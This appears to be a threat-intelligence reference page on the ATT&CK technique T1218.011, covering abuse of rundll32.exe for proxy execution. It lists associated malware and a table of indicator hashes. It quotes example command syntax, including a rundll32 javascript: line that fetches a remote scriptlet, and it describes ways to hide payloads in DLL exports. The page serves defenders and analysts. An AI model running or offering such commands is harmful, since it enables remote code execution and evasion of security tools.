FORENSIA

ATT&CK · T1218.011 · sub-technique

Rundll32

Tactics: stealth

About

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>). Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe. Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. Threat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection. Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>). Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

Used by actors

26 known groups

Software

69 malware/tools implement this

gh0st RATJHUHUGITADVSTORESHELLCozyCarSakulaEliseEmissaryBackdoor.OldreaPrikormkaCORESHELLPowerDukeWinnti for WindowsStreamExFlamePteranodonRTMCobalt StrikeMatryoshkaPUNCHBUGGYBribaKwampirsComnieKoadicDDKONGMosquitoInvisiMoleFELIXROOTBisonalGreyEnergyNOKKIKONNINotPetyaFlawedAmmyyServHelperZxShellAttorUSBferrySDBbotRagnar LockerIcedIDFatDukePolyglotDukeBLINDINGCANEgregorSUNBURSTEVILNUMMegaCortexSibotBad RabbitEnvyScoutBoomBoxNativeZoneQakBotHermeticWizardMongallHeyoka BackdoorSquirrelwaffleBumblebeeFunnyDreamPcShareDEADEYESVCReadyNinjaMispaduRaspberry RobinLatrodectusStrelaStealerKapekaTroll Stealer

Corpus indicators tagged with this technique

538 indicators in the corpus carry T1218.011.

IndicatorTypeFamilySevSrc
cve-2026-3102cve853
b0e292346b4ab3f83fadd8abcce7cfc5b9d50ef73ad141e8bc4a4689fee13504hashransomware802
e4ccb2328c06710a7f0254cb6315e1b106396b0ff525f9cf3eada6e85d285c1csha256801
c5a53c02d531c5e46f9cc2fc0afbb88dhashcryptojacking802
a14bed1c46ba7406d5240e979251ccd394dfe3b5hashcryptojacking802
e20b35a8c30e076cdd0e1df05ba1ff2e418dbd39a674f084787cc0af2fda9e95sha256phishing801
e84b1e2c432b2394c403b524b8361ffa9923a022eb05215f1dc811bc167c3c5ehashcryptojacking802
d42aecf76fb1531cd5b7139e669910b2fd82a90b7e11448128e226775bf5d42ehashcryptojacking802
69315b7a1c4bf5ee56cba1de29d1761ehashcryptojacking802
b6a77b7892ef22d6afd91eb980a3f3d8hashcryptojacking802
5d253cc263851ec68c0a988bf86afbb3e9f0b491hashcryptojacking802
07cd03e2082bcb0b890cc59ce4c770d1a095ac6f1ae9cf999f5542555c56f841sha256phishing801
670384fafb23140d96f2f8fe04a13fc8cc8e2a6e5e8c973e39b58d103c5fea92sha256phishing801
b90988400cced319d260c4937f334ecc364785ed5c593cd2139965e62ca58173sha256phishing801
1fc5e6458316277fae8272cbe9f3dfc86b681635hashcryptojacking802
462af0a3a9094d44c30cc65544ec1171a62365cff09e67f5e87e061a3d604bd0hashcryptojacking802
e5e43b0830369c39fab45363486da4d21a98c5097ea262c9816997f11c73c1c4hashphishing802
9758e76b601798a30d903bf05052a53df80451e5c156548ce9da828f608b6470sha256801
221a39856b37e3c682f62427f1e6b965b36a2405764689c914672770a01a1fa9sha256801
93b3d3925ccc201ab0f16017153a79ef05b8f5c2hashcryptojacking802
bd46890121106b43f0c01ab82629400chashcryptojacking802
ce62d1b6116f34f9ba815db1e2016d2ahashcryptojacking802
579a82dde4425d95e20a22171be0a37702c833fdca6e5e04f69099a025863136hashcryptojacking802
50eda29bfbeeb8b0429718447725016ahashcryptojacking802
b5da6ffa5f85aa5016fbc02a3122361c85d21192c45df9544099d13e6ff84c36hashcryptojacking802
41f581f7d2c09ab0edfea850b9db506fhashcryptojacking802
a37f6403fbf28fa0b48863287f4c5a5dhashcryptojacking802
89930bd18e0f9c9c98dfb1662cb87aa98348e87164ab62b1f39e86ebf2ce24cbhashcryptojacking802
107b5aa3c4ef30b9b832e0a10b1efb1dcf433158bc6af8d890d66c0c9ed50d21sha256801
3d510977d60a44322f88100b515f06cb5ed83babc64247068d1a489595faa6c5sha256phishing801

Showing the top 30 by severity of 538.